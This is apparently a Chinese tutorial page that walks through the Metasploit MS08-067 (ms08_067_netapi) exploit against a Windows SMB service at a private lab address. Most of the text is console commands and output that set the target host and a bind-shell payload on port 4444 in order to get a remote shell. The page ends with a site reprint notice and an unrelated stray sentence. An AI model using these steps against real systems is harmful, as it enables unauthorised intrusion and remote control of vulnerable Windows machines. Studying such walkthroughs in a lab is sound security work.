Module: exploit/windows/smb/ms08_067_netapi
Version: 12540
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm
?name=2008-4250
NEXPOSE (dcerpc-ms-netapi-netpathcanonicalize-dos)
msf exploit(ms08_067_netapi) >
查看攻击目标主机的需要配置的选项
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.200.140 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique: seh, thread, process,none
LPORT 4444 yes The listen port
RHOST 192.168.200.140 no The target address
Exploit target:
Id Name
— —-
0 Automatic Targeting
################使用Bind Shell方式#######################
设置相关参数
msf exploit(ms08_067_netapi) > set RHOST 192.168.200.140
RHOST => 192.168.200.140
设置payload
msf exploit(ms08_067_netapi) > set payloadwindows/shell_bind_tcp
payload => windows/shell_bind_tcp
查看你设置参数的情况
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.200.140 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-28348-3.html
于是俺们厂里买了好多跟废品差不多的浙商设备